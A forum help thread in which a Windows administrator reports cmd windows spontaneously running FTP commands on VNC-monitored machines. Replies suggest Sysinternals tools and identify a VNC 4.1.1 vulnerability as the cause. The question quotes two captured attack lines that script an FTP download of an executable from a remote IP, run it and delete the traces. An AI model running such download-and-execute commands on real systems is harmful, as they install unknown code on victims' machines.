Solved

cmd opens, runs ftp command and closes

Posted on 2006-11-30
5
526 Views
Last Modified: 2008-01-09
hi all

I have some wxpSP2/W2003Server boxes being watch with VNC, watching what they are doing.   sometimes they open a cmd window with the following commands

cmd.exe /c del i&echo open 10.200.17.43 18766 > i&echo user 1 1 >> i &echo get 674.exe >> i &echo quit >> i &ftp -n -s:i &674.exe&del i&exit
cmd.exe /c del i&echo open 10.200.27.43 8196 > i&echo user 1 1 >> i &echo get 072.exe >> i &echo quit >> i &ftp -n -s:i &072.exe&del i&exit

ive seen this in some other computers, with virus, sometimes i see it trying to download other exe names.

i've already  avg-adaware-spybot-regedit-systedit'ED  those boxes and nothing strange came out,

i took a photo of the process list after and before and the only different thing is CMD run supossedly by me.

i ve seen this in some other computers and im sure im not the only one.

any ideas ?

I hate xp, how can someone run something on a computer that does not have nothing to do with internet ?   the only thing that is internet related in that box is antivirus updating.  

I HATE XP ZILLION Vulnerabilities.


0
Comment
Question by:HTorres
  • 2
  • 2
5 Comments
 
LVL 4

Author Comment

by:HTorres
ID: 18051858
Thanks in advance all
0
 
LVL 70

Expert Comment

by:Merete
ID: 18052350
These days anything is possible I would be concerned with too, any staff clients trying to hack into the system?
Here is two great tools from systernals
process explorer may assist you
Ever wondered which program has a particular file or directory open? Now you can find out. Process Explorer shows you information about which handles and DLLs processes have opened or loaded.
http://www.microsoft.com/technet/sysinternals/utilities/ProcessExplorer.mspx

RegMon for Windows v7.04
http://www.microsoft.com/technet/sysinternals/utilities/regmon.mspx

All Systernal tools
http://www.microsoft.com/technet/sysinternals/default.mspx

Active Ports is another great little tool it will show which ports are active and you can queiry it and even stop them.
http://www.download.com/3000-2085-10062969.html

Hope they bring some light to this issue
Merete
0
 
LVL 11

Accepted Solution

by:
ch2 earned 250 total points
ID: 18052401
This is a vulnerability of the VNC.

This PAQ: http:Q_22047347.html
0
 
LVL 4

Author Comment

by:HTorres
ID: 18055261
Merete, great links
thank you!

--

Ch2, that was it!!!

Ive noticed that this thing only happened in vnc411, the other computers where we have vnc412 are without incidents.

One thing came to my mind.  my ISP is a moron and they have all ports closed (they even tried to close port 25) ... so i can connect from here to other computers via internet, but i cannot connect (from there) to our computers here
How can someone could enter here and exploit a vulnerability and I cannot connect ?

i will take a look at activeports

what port they are using?

0
 
LVL 70

Expert Comment

by:Merete
ID: 18058904
thanks glad you like them  
0

Featured Post

Enterprise Mobility and BYOD For Dummies

Like “For Dummies” books, you can read this in whatever order you choose and learn about mobility and BYOD; and how to put a competitive mobile infrastructure in place. Developed for SMBs and large enterprises alike, you will find helpful use cases, planning, and implementation.

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

Suggested Solutions

Disclosure: Use this tutorial only when no other options helps to get Windows XP running without any problems and you don't want to format the drive. The back up of the data is the responsible of the user, however there is a description of how t…
For both online and offline retail, the cross-channel business is the most recent pattern in the B2C trade space.
Internet Business Fax to Email Made Easy - With  eFax Corporate (http://www.enterprise.efax.com), you'll receive a dedicated online fax number, which is used the same way as a typical analog fax number. You'll receive secure faxes in your email, f…
With the power of JIRA, there's an unlimited number of ways you can customize it, use it and benefit from it. With that in mind, there's bound to be things that I wasn't able to cover in this course. With this summary we'll look at some places to go…

920 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question

Need Help in Real-Time?

Connect with top rated Experts

17 Experts available now in Live!

Get 1:1 Help Now